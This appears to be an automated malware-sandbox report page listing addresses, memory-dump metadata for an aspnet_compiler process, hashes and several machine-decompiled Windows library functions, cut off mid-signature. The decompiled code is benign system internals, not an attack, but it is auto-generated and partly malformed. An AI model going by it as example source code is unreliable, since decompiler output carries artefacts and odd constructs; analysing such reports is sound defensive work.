0x01144d53
0x01144d59
0x01144db9
0x01144dba
0x01144dbf
0x01144dc2
0x01144dc4
0x01144dc7
0x01144dce
0x00000000
0x01144dce
0x01144d5b
0x01144d61
0x00000000
0x00000000
0x01144d63
0x01144d69
0x00000000
0x00000000
0x01144d6b
0x01144d6e
0x01144d74
0x01144d76
0x01144d7c
0x01144d7e
0x01144d84
0x01144d89
0x01144d8c
0x01144d8d
0x01144d92
0x01144d95
0x01144d96
0x01144d98
0x01144d9a
0x01144d9f
0x01144da4
0x01144da6
0x01144da8
0x01144daf
0x01144db1
0x01144db1
0x01144daf
0x01144da6
0x01144d84
0x01144d7c
0x00000000
0x01144d74
0x011004d6
0x01144de1
0x011004dc
0x011004dc
0x011004dc
0x011004e4
0x01144deb
0x01144df1
0x01144df8
0x01144dfe
0x01144e03
0x01144e05
0x01144e17
0x01144e07
0x01144e10
0x01144e10
0x01144e1c
0x01144e1f
0x01144e35
0x01144e35
0x01144e1f
0x01144df8
0x011004f1
0x011004fa
0x01144e3f
0x01144e47
0x01144e5b
0x01144e61
0x01144e67
0x01144e69
0x01144e71
0x01144e73
0x01100500
0x01100500
0x01100500
0x011004fa
0x01100508
0x0110051d
0x0110051d
0x0110051f
0x01100524
0x00000000
0x01100524
0x01100515
0x01100517
0x01144e7a
0x01144e7c
0x00000000
0x00000000
0x01144e85
0x00000000
0x01144e85
0x00000000
0x01100517

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e85346bf4d8b37b39a3cdfbeb62340349cfd91b9d93cdde0624d42fef67af46
Instruction ID: 59d1318619f982835f1ce473c883d0c7a869532a7b83d7ffba09ea4feb2a433a
Opcode Fuzzy Hash: 8e85346bf4d8b37b39a3cdfbeb62340349cfd91b9d93cdde0624d42fef67af46
Instruction Fuzzy Hash: 89916931E002559FEB3E9B6CC844BAD7FA4AF09B64F060261FA60E76D1D7B49D40C786

Uniqueness

Uniqueness Score: -1.00%

Function 010FB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E010FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x11cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E010F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E011A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01119E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0111B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0111CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E010F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E011A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0111AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x11c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x11c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x11c8628; // 0x0
							_t116 =  *0x11c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x010fb94c
0x010fb956
0x010fb95c
0x010fb95e
0x010fb964
0x010fb969
0x010fb96d
0x010fb96d
0x010fb970
0x010fb974
0x010fb97a
0x010fbadf
0x010fbadf
0x010fbae2
0x010fbae4
0x010fbae6
0x010fbaf0
0x01142cb8
0x010fbaf6
0x010fbaf6
0x010fbaf6
0x010fbafd
0x010fbb1f
0x010fbb1f
0x010fbaff
0x010fbb00
0x010fbb00
0x010fbb03
0x010fbb03
0x010fbacb
0x010fbacf
0x010fbad0
0x010fbad1
0x010fbadc
0x010fbadc
0x010fb980
0x010fb980
0x010fb988
0x010fb98b
0x010fb98d
0x010fb990
0x010fb993
0x010fb999
0x010fb99b
0x010fb9a1
0x010fb9a5
0x010fb9aa
0x010fb9b0
0x010fb9bb
0x010fb9c0
0x010fb9c3
0x010fb9ca
0x010fb9cc
0x010fb9cf
0x010fb9d3
0x010fb9d7
0x010fba94
0x010fba94
0x010fba98
0x010fbaa3
0x01142ccb
0x010fbaa9
0x010fbaa9
0x010fbaa9
0x010fbab1
0x01142cd5
0x01142cdd
0x01142cdd
0x010fbabb
0x010fbabc
0x010fbac2
0x010fbac3
0x010fbac3
0x010fbac6
0x00000000
0x010fb9dd
0x010fb9dd
0x010fb9e7
0x010fb9e7
0x010fb9ec
0x010fb9ec
0x010fb9f1
0x010fb9f5
0x010fb9fa
0x010fba00
0x010fba0c
0x010fba10
0x010fba10
0x010fba12
0x010fba18
0x00000000
0x00000000
0x010fbb26
0x010fbb26
0x010fba1e
0x010fba1e
0x010fba23
0x010fba25
0x010fba2c
0x010fba30
0x010fba35
0x010fba35
0x010fba41
0x010fba46
0x010fba4c
0x010fba50
0x010fba54
0x010fba6a
0x010fba6e
0x010fba70
0x010fba74
0x010fba78
0x010fba7a
0x010fba7c
0x010fba8e
0x010fba90
0x010fba92
0x010fbb14
0x010fbb14
0x010fbb16
0x010fbb16
0x00000000
0x010fba7c
0x010fbb0a
0x010fbb0d
0x00000000
0x00000000
0x00000000
0x010fbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010FB9A5

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 03de8d3789a1b00576af2c1a46e703fc79eaceeececcbe2af7bb5e7e1c3af1df
Instruction ID: 22c0818e4a0919b8e2c65eb52c09ddc9554e58966e07ddb97c3675707f146269
Opcode Fuzzy Hash: 03de8d3789a1b00576af2c1a46e703fc79eaceeececcbe2af7bb5e7e1c3af1df
Instruction Fuzzy Hash: D0514571A08351CFC724DF29C08192ABBE5FB88614F1489AEEAD587B55D770E844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 010DB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E010DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x11af7a8);
				E0112D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0112D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0111D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0111F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E0112DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0111B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0111B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0111E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0111A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x010db171
0x010db171
0x010db171
0x010db171
0x010db171
0x010db176
0x010db17b
0x010db180
0x010db186
0x010db18f
0x010db198
0x010db1a4
0x010db1aa
0x01134802
0x01134802
0x01134805
0x0113480c
0x0113480e
0x010db1d1
0x010db1d3
0x010db1de
0x010db1de
0x01134817
0x0113481e
0x01134820
0x01134822
0x01134822
0x01134824
0x01134824
0x0113482a
0x00000000
0x00000000
0x01134835
0x0113483a
0x0113483d
0x0113483f
0x01134842
0x01134842
0x01134842
0x01134846
0x0113484c
0x0113484e
0x01134851
0x01134851
0x01134853
0x01134854
0x01134854
0x01134858
0x0113485a
0x0113485a
0x0113485d
0x0113485f
0x01134861
0x01134861
0x01134866
0x0113486b
0x0113486e
0x01134871
0x01134876
0x01134876
0x01134878
0x0113487b
0x01134884
0x01134884
0x00000000
0x0113487d
0x0113487d
0x01134882
0x01134889
0x01134889
0x0113488f
0x01134891
0x011348e0
0x011348e2
0x011348e4
0x011348e4
0x011348e7
0x011348e7
0x011348ed
0x011348f4
0x011348f6
0x01134951
0x01134951
0x01134953
0x01134953
0x01134956
0x01134956
0x01134958
0x01134959
0x01134959
0x0113495d
0x0113495d
0x0113495f
0x0113495f
0x01134965
0x01134969
0x011349ba
0x011349ba
0x011349c1
0x011349c5
0x011349cc
0x011349d4
0x011349d7
0x011349da
0x011349e4
0x011349e5
0x011349f3
0x01134a02
0x00000000
0x01134a02
0x01134972
0x01134974
0x00000000
0x00000000
0x01134976
0x01134979
0x01134982
0x01134983
0x01134984
0x0113498b
0x0113498d
0x01134991
0x01134993
0x01134999
0x0113499d
0x011349a2
0x011349a2
0x011349a2
0x01134999
0x011349ac
0x00000000
0x011349b3
0x011348f8
0x011348fe
0x00000000
0x00000000
0x00000000
0x011348fe
0x01134895
0x0113489c
0x011348ad
0x011348b2
0x011348b5
0x011348b7
0x011348ba
0x011348bc
0x011348c6
0x011348c6
0x011348cb
0x011348d1
0x011348d4
0x011348d8
0x011348d8
0x00000000
0x011348d8
0x011348be
0x011348c0
0x00000000
0x00000000
0x011348c2
0x00000000
0x00000000
0x00000000
0x011348c4
0x00000000
0x01134882
0x0113487b
0x01134904
0x01134906
0x00000000
0x00000000
0x01134908
0x0113490e
0x00000000
0x00000000
0x01134910
0x01134917
0x01134917
0x00000000
0x01134917
0x010db1ba
0x011347f9
0x011347fc
0x00000000
0x00000000
0x00000000
0x011347fc
0x010db1c0
0x010db1c0
0x010db1c3
0x010db1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 011348AD

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: b636a2e7171ffdee85a47bbb8f180a9bde37501a4c2afd4b999dbb4b6a890275
Instruction ID: 929793d080ba56bd0b02704df04a580ee30118e3b567e599f72f1af5059e2f26
Opcode Fuzzy Hash: b636a2e7171ffdee85a47bbb8f180a9bde37501a4c2afd4b999dbb4b6a890275
Instruction Fuzzy Hash: 9551F371D00269CEEF39CFA8C844BAEBBB0BF85314F1141ADD859AB68AD7304945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01114A2C Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01114A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x11cd360 ^ _t62;
				_v8 =  *0x11cd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E010F2280(_t26, 0x11c8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E010EFFB0(_t41, _t51, 0x11c8608);
						L2:
						 *0x11cb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0111B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E010F2280(_t28, 0x11c8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E010EFFB0(_t42, _t53, 0x11c8608);
							if(_t53 != 0) {
								L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E010EFFB0(_t41, _t51, 0x11c8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01114a2c
0x01114a34
0x01114a3c
0x01114a3e
0x01114a48
0x01114a4b
0x01114a4d
0x01114a51
0x01114a9c
0x00000000
0x00000000
0x01114aa3
0x01114aa8
0x01114aad
0x01114ab1
0x01114ade
0x01114ae3
0x01114a5a
0x01114a62
0x01114a6a
0x01114a6e
0x0114f203
0x01114a84
0x01114a88
0x01114a89
0x01114a8a
0x01114a95
0x01114a95
0x01114a79
0x01114a80
0x01114af2
0x01114af4
0x01114af9
0x01114aff
0x01114b01
0x01114b03
0x01114b08
0x0114f20a
0x0114f212
0x0114f216
0x0114f216
0x01114b08
0x01114b13
0x01114b1a
0x0114f229
0x0114f229
0x01114b1a
0x01114a82
0x00000000
0x01114a82
0x01114ab7
0x01114acd
0x01114acd
0x01114ad5
0x01114ada
0x00000000
0x01114ada
0x01114ac2
0x01114acb
0x00000000
0x00000000
0x00000000
0x01114acb
0x01114a53
0x01114a53
0x01114a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01114A62

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7b5fa6b7768e86953134d03f74957882a0d8aceb23b627deda0e7ca720469330
Instruction ID: c02a729eece2003a0f8c4fd82d1e9e4a9be2f99150c05dcb86110f49c8594bba
Opcode Fuzzy Hash: 7b5fa6b7768e86953134d03f74957882a0d8aceb23b627deda0e7ca720469330
Instruction Fuzzy Hash: 5431EF322052629FD7299F19D984B6AFBA5FF90F10F02043DE9964BA45CB70D801CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 010F0050 Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E010F0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x11cd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01109ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0111B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E011A8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01109702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x11cb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x010f0055
0x010f005d
0x010f0062
0x010f006c
0x010f006f
0x010f0074
0x010f007a
0x010f007a
0x010f0080
0x010f0080
0x010f0087
0x010f008d
0x010f008f
0x010f0093
0x010f0095
0x010f009b
0x010f00f8
0x010f00fb
0x010f00fc
0x010f00ff
0x010f0108
0x010f0108
0x010f00a2
0x010f00a6
0x010f00b3
0x010f00bc
0x010f00c5
0x010f00ca
0x0113c01e
0x00000000
0x00000000
0x0113c02d
0x010f00d5
0x010f00d9
0x0113c03d
0x0113c046
0x0113c046
0x010f00df
0x010f00e2
0x010f00ea
0x010f00ef
0x010f00f2
0x010f00f6
0x010f0111
0x010f0117
0x010f0117
0x00000000
0x010f00f6
0x010f00d0
0x010f00d0
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 010F0111

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 938cf02eab8f9e6b75ffd5c1acaf6cf700f7d53d9dcc9309aa44101c693c04a7
Instruction ID: a35672d344a661bc195ada413f8b938fb6f7f3c634ce34ad26d4b03b6ededebe
Opcode Fuzzy Hash: 938cf02eab8f9e6b75ffd5c1acaf6cf700f7d53d9dcc9309aa44101c693c04a7
Instruction Fuzzy Hash: 7B31DD31201B04CFD726CF28C841B9AB7E6FF88314F1445ADF5AA87A95EB35AC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01102581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E01102581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912012) {
